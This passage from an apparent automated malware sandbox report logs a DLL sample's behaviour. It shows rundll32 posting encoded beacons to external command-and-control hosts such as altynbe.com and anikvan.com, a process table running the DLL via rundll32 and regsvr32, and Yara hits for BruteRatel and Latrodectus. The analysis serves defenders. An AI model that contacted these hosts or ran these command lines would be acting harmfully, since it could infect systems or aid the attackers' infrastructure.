    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:13 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:13 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:05:13 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49769 | 3.69.236.35 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:14 UTC | 279 | OUT | POST /api/azure HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:14 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:14 UTC | 253 | IN | HTTP/1.1 200 OK
    Date: Fri, 10 May 2024 22:05:14 GMT
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    X-Ratelimit-Limit: 0
    X-Ratelimit-Remaining: 0
    X-Ratelimit-Reset: 0
    Strict-Transport-Security: max-age=15724800; includeSubDomains


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49770 | 138.124.183.215 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:15 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: altynbe.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:15 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:15 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:05:15 GMT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49771 | 3.69.236.35 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:21 UTC | 281 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:21 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:21 UTC | 206 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 10 May 2024 22:05:21 GMT
    Content-Type: text/plain; charset=utf-8
    Content-Length: 9
    Connection: close
    Strict-Transport-Security: max-age=15724800; includeSubDomains
2024-05-10 22:05:21 UTC | 9 | IN | Data Raw: 4e 6f 74 20 46 6f 75 6e 64
    Data Ascii: Not Found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49772 | 138.124.183.215 | 443 | 7320 | C:\Windows\System32\rundll32.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-10 22:05:27 UTC | 247 | OUT | POST /content.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
    Host: altynbe.com
    Content-Length: 154
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-05-10 22:05:27 UTC | 154 | OUT | Data Raw: 33 39 33 62 30 33 64 66 65 30 37 37 32 64 31 64 35 63 62 64 64 31 38 33 63 39 37 66 37 63 65 36 64 32 61 37 38 62 33 39 66 39 31 64 34 31 30 61 61 34 38 31 36 32 62 39 65 34 61 32 30 65 66 63 65 31 34 65 65 38 30 63 34 66 39 30 30 34 31 64 31 36 36 30 66 62 31 34 62 38 65 37 33 35 62 63 32 35 33 65 37 32 64 31 34 64 32 63 64 33 34 34 34 35 66 36 62 35 39 38 30 65 39 66 35 39 32 64 35 34 31 35 66 63 63 36 34 37 64 64 32 30 33 39 37 36 65 35 38 34 31 33 64 31
    Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
2024-05-10 22:05:27 UTC | 150 | IN | HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Content-Type: text/html
    Content-Length: 0
    Connection: close
    Date: Fri, 10 May 2024 22:05:27 GMT


Session ID: 21
Source IP: 192.168.2.4
Source Port: 49773
Destination IP: 138.124.183.215
Destination Port: 443
PID: 7320
Process: C:\Windows\System32\rundll32.exe

[2024-05-10 22:05:33 UTC] 245 bytes OUT
POST /api/azure HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: altynbe.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
[2024-05-10 22:05:33 UTC] 154 bytes OUT
Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
[2024-05-10 22:05:33 UTC] 150 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Fri, 10 May 2024 22:05:33 GMT


Session ID: 22
Source IP: 192.168.2.4
Source Port: 49774
Destination IP: 138.124.183.215
Destination Port: 443
PID: 7320
Process: C:\Windows\System32\rundll32.exe

[2024-05-10 22:05:34 UTC] 247 bytes OUT
POST /content.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: altynbe.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
[2024-05-10 22:05:34 UTC] 154 bytes OUT
Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
[2024-05-10 22:05:35 UTC] 150 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Fri, 10 May 2024 22:05:35 GMT


Session ID: 23
Source IP: 192.168.2.4
Source Port: 49775
Destination IP: 138.124.183.215
Destination Port: 443
PID: 7320
Process: C:\Windows\System32\rundll32.exe

[2024-05-10 22:05:39 UTC] 245 bytes OUT
POST /api/azure HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: altynbe.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
[2024-05-10 22:05:39 UTC] 154 bytes OUT
Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
[2024-05-10 22:05:40 UTC] 150 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Fri, 10 May 2024 22:05:40 GMT


Session ID: 24
Source IP: 192.168.2.4
Source Port: 49776
Destination IP: 95.164.68.73
Destination Port: 443
PID: 7320
Process: C:\Windows\System32\rundll32.exe

[2024-05-10 22:05:41 UTC] 247 bytes OUT
POST /content.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: anikvan.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
[2024-05-10 22:05:41 UTC] 154 bytes OUT
Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
[2024-05-10 22:05:42 UTC] 150 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Fri, 10 May 2024 22:05:42 GMT


Session ID: 25
Source IP: 192.168.2.4
Source Port: 49777
Destination IP: 104.21.16.155
Destination Port: 443
PID: 2580
Process: C:\Windows\explorer.exe

[2024-05-10 22:05:45 UTC] 229 bytes OUT
POST /live/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: workspacin.cloud
Content-Length: 248
Cache-Control: no-cache
[2024-05-10 22:05:45 UTC] 248 bytes OUT
Data Ascii: IIvIXJtemrX0nqa1KffJhSRudl4THZASkadns/30xFjblqbF9Fc2S2lHgDRPAlltUL9RUmRAe0IDHMF9L09plfGxnMEX2iOj8rxWdYoCBK4DDiykYL2sPJHU7zmfMNJOTrkXbLNdgsaVPayfqRp0iF9JnlNiye76DLyGVfhp5WkI0VWQAtgZd2AY2tYwR+BtnaLejB7v01nAA+93IOnSwqVMn+xRKdmAfik1pM6AfhcsOX+BdW0eMQfq
[2024-05-10 22:05:53 UTC] 570 bytes IN
HTTP/1.1 200 OK
Date: Fri, 10 May 2024 22:05:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTiv4vVu1rumrKrAIXyBD8VGMPnhRvnHiuPBcMB4eDTwus2sF72HzgyQHeSyEMg87Zk0GJnOGApD7WRxGEtKkCzAKRtRg%2Ftf7fYbpJ303MrP9ARPvn7deUio6qJ%2Fabl9QCWA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 881d3b84c8ab8c3b-EWR
alt-svc: h3=":443"; ma=86400
[2024-05-10 22:05:53 UTC] 26 bytes IN
Data Raw: 31 34 0d 0a 41 4b 76 77 66 36 35 31 72 50 54 31 67 61 37 42 55 77 3d 3d 0d 0a
Data Ascii: 14AKvwf651rPT1ga7BUw==
[2024-05-10 22:05:53 UTC] 5 bytes IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 26
Source IP: 192.168.2.4
Source Port: 49778
Destination IP: 95.164.68.73
Destination Port: 443
PID: 7320
Process: C:\Windows\System32\rundll32.exe

[2024-05-10 22:05:45 UTC] 245 bytes OUT
POST /api/azure HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Host: anikvan.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
[2024-05-10 22:05:45 UTC] 154 bytes OUT
Data Ascii: 393b03dfe0772d1d5cbdd183c97f7ce6d2a78b39f91d410aa48162b9e4a20efce14ee80c4f90041d1660fb14b8e735bc253e72d14d2cd34445f6b5980e9f592d5415fcc647dd203976e58413d1
[2024-05-10 22:05:46 UTC] 150 bytes IN
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html
Content-Length: 0
Connection: close
Date: Fri, 10 May 2024 22:05:46 GMT


Session ID: 27
Source IP: 192.168.2.4
Source Port: 49782
Destination IP: 104.21.16.155
Destination Port: 443
PID: 2580
Process: C:\Windows\explorer.exe

[2024-05-10 22:05:54 UTC] 229 bytes OUT
POST /live/ HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: workspacin.cloud
Content-Length: 180
Cache-Control: no-cache
[2024-05-10 22:05:54 UTC] 180 bytes OUT
Data Ascii: IIvIXJtemrX1nqa1KffJhSRudl4THZASkadns/30xFjblqbF9Fc2S2lHgDRPAlltUL9RUmRAe0IDHMF9L09plfGxnMEX2iOj8rxWdYoCBK4DDiykYL2sPJHU7zmfMNJOTrkXbLNdgsaVPayfqRp0iF9JnlNiye76DLyGVfhp5WkI0VWQAtg=
[2024-05-10 22:06:11 UTC] 574 bytes IN
HTTP/1.1 200 OK
Date: Fri, 10 May 2024 22:06:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9bY1KwWUy0LTwNia%2F0eOSRBpY1hleYMm6esKPxUNDPeDXRdIEu5km4Bj5lacbpsOKrp8rjIXk%2FpRq4ha4Ew7ouYb9TrhFm944mDP4sysin88bz%2Fc1AvX092U9i4G%2FB4052D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 881d3bc26817c402-EWR
alt-svc: h3=":443"; ma=86400
[2024-05-10 22:06:11 UTC] 5 bytes IN
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Target ID: 0
Start time: 00:03:58
Start date: 11/05/2024
Path: C:\Windows\System32\loaddll64.exe
Wow64 process (32bit): false
Commandline: loaddll64.exe "C:\Users\user\Desktop\upfilles.dll.dll"
Imagebase: 0x7ff61d400000
File size: 165'888 bytes
MD5 hash: 763455F9DCB24DFEECC2B9D9F8D46D52
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 1
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 2
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
Imagebase: 0x7ff70e6c0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 00:03:59
Start date: 11/05/2024
Path: C:\Windows\System32\regsvr32.exe
Wow64 process (32bit): false
                                                                                                                    Commandline:regsvr32.exe /i /s C:\Users\user\Desktop\upfilles.dll.dll
                                                                                                                    Imagebase:0x7ff64ee30000
                                                                                                                    File size:25'088 bytes
                                                                                                                    MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:5
                                                                                                                    Start time:00:03:59
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllCanUnloadNow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:00:04:02
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllGetClassObject
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:9
                                                                                                                    Start time:00:04:02
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6324 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:10
                                                                                                                    Start time:00:04:05
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe C:\Users\user\Desktop\upfilles.dll.dll,DllInstall
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:12
                                                                                                                    Start time:00:04:05
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 6516 -s 344
                                                                                                                    Imagebase:0x7ff67a3b0000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllCanUnloadNow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:14
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllGetClassObject
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllInstall
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",DllUnregisterServer
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                    Target ID:18
                                                                                                                    Start time:00:04:08
                                                                                                                    Start date:11/05/2024
                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",stow
                                                                                                                    Imagebase:0x7ff74e4b0000
                                                                                                                    File size:71'680 bytes
                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
